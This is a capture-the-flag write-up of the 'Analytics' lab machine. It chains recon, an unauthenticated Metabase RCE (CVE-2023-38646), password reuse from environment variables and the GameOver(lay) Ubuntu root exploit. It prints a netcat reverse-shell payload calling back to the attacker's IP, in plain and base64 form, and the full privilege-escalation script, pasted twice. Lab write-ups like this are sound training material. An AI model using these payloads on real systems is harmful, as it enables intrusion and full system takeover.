Analytics

Target IP: 10.129.229.224
Challenge Description: N/A.


Reconnaissance

eb7c08327b8acb5174a6f30da6c60d36.png
Performing a port scan using the command sudo nmap -sS 10.129.229.224 -p- returns the result shown above. There are two TCP ports open on the target machine: SSH and HTTP on their standards ports.

651575dc0c0bdfa3924fba9835d6f6c3.png
I performed an aggressive port scan using the command sudo nmap -sV -A 10.129.229.224 -p 22,80 against the two TCP ports and retrieved the result shown above. According to the HTTP scan, the hostname of the target machine is analytical.htb. I will need to insert this hostname inside my /etc/hosts before performing enumeration.

57b258aa3229c6650ed2d568670ae13c.png
I inserted the hostname analytical.htb inside my /etc/hosts file. Then I decided to perform a subdomain enumeration using the command ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.analytical.htb" -u http://analytical.htb -fs 154 and obtained the subdomain data, as shown above. I will insert this new subdomain with the name data.analytical.htb inside my /etc/hosts file too. Time to begin with enumeration now :)


Enumeration

Port 80: HTTP (analytical.htb)
77fb127051c1d6e49170d0a23e204b3d.png
The webpage above is displayed for this web application on port 80. I performed a directory search but I did not find anything useful. The website seems to be mainly static. However, pressing the Login button redirects me to http://data.analytical.htb.

Port 80: HTTP (data.analytical.htb)
8fd5abacad8871c226ae1022ec1a4789.png
The webpage above is displayed for this web application. The target machine seems to be running Metabase application on this port. It is asking for the email and password, but I have not found any credentials yet. Time to enumerate further.

45380a790654ed2eafa2bed92346a2c6.png
Reading through the source code of the webpage, I identified an application version v0.46.6 as shown above. Is the target machine running Metabase v0.46.6? Does it have any vulnerabilities? Time to find out.

f69144b4169e3f16209523a2ddcdd62e.png
Searching for Metabase v0.46.6 vulnerabilities on Google, I found the website above. Apparently the application is vulnerable to RCE without the need of authentication. If the target machine is really running this application version then it is vulnerable to RCE. I do not require the credentials either to perform RCE.


Exploitation

875df47087ff152b43aa33416a439aba.png
I searched for public exploits for this vulnerability and found the Github repository shown above. This vulnerability has the CVE id of CVE-2023-38646. This repository contains the steps on how to use the exploit. I made a copy of the exploit on my machine and renamed it to exp.py. Time to test it now.

4429d72ffc6275c65cfa3785ca222ece.png
To run the exploit, I opened two terminals as shown above. The top terminal is where I execute the exploit. The bottom terminal is where I have a listener on my machine at port 8443 to catch the reverse shell connection. Firstly, I started a listener on my machine at port 8443. Then I encoded the following payload rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.139 8443 >/tmp/f into base64 and received the output cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4xMzkgODQ0MyA+L3RtcC9m. To run the exploit, I used the command python3 exp.py -x cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4xMzkgODQ0MyA+L3RtcC9m http://data.analytical.htb. Then I instantly obtained a reverse shell connection with the session as metabase, as shown above.


Privilege Escalation

face96345f7e9edcdb10c38395e9c538.png
I executed the command printenv and obtained the result shown above. The password An4lytics_ds20223# of the user metalytics is stored inside the variable META_PASS. I landed in a docker environment, as I have very little control over the target machine in this session. Maybe now I can access the web application using this new credentials?

baab18602ea25490ffb7ca45f900e92f.png
Using the same credentials, I managed to login into the web application. There is an unusual name called Johnny. Is this user an administrator on the web application?

68cd3a240f5398308f93d89f8ac8ddbc.png
After some manual enumeration on the web application, I notice the user is an admin as shown above. I tried to find other attack vectors that would give me a higher privilege session reverse shell connection, but I had no luck. I tried to find consoles to perform command execution, webpages to upload a webshell, etc, but I had no luck. SSH is open on port 22. Maybe I can try to SSH into the target machine with the username metalytics@analytical.htb and the password An4lytics_ds20223#?

e9251ac4aae30554177c707f672f739e.png
And it worked. Now I have an SSH session as the user metalytics on the target machine. I successfully elevated my privileges horizontally.

07cbe03ad2f065a94a8b8af2ade353ff.png
The target machine is running the kernel version 6.2.0-25-generic and Ubuntu 22.04.3 LTS as the OS. From previous knowledge, I know this kernel version is vulnerable to GameOver(lay) Ubuntu Privilege Escalation.

70994377d74704eefdabb7d1acd7ae54.png
I found the Github repository shown above for this vulnerability. Then I made a copy of the script inside this repository on the target machine for privilege escalation.

1148db0ebf3f8e1114142273142e490c.png
At /tmp directory, I made a copy of the script with the name exp.sh. Then I changed the permission of the script to be executable. I then executed the script and obtained a root shell, as shown above. Now I have root access on the target machine :) The content of the script is shown below:

#!/bin/bash

# CVE-2023-2640 CVE-2023-3262: GameOver(lay) Ubuntu Privilege Escalation
# by g1vi https://github.com/g1vi
# October 2023

echo "[+] You should be root now"
echo "[+] Type 'exit' to finish and leave the house cleaned"

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
#!/bin/bash

# CVE-2023-2640 CVE-2023-3262: GameOver(lay) Ubuntu Privilege Escalation
# by g1vi https://github.com/g1vi
# October 2023

echo "[+] You should be root now"
echo "[+] Type 'exit' to finish and leave the house cleaned"

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'

Flags

09da183a7ab759a0eeb638c8730f52a2.png
The two flags are shown above.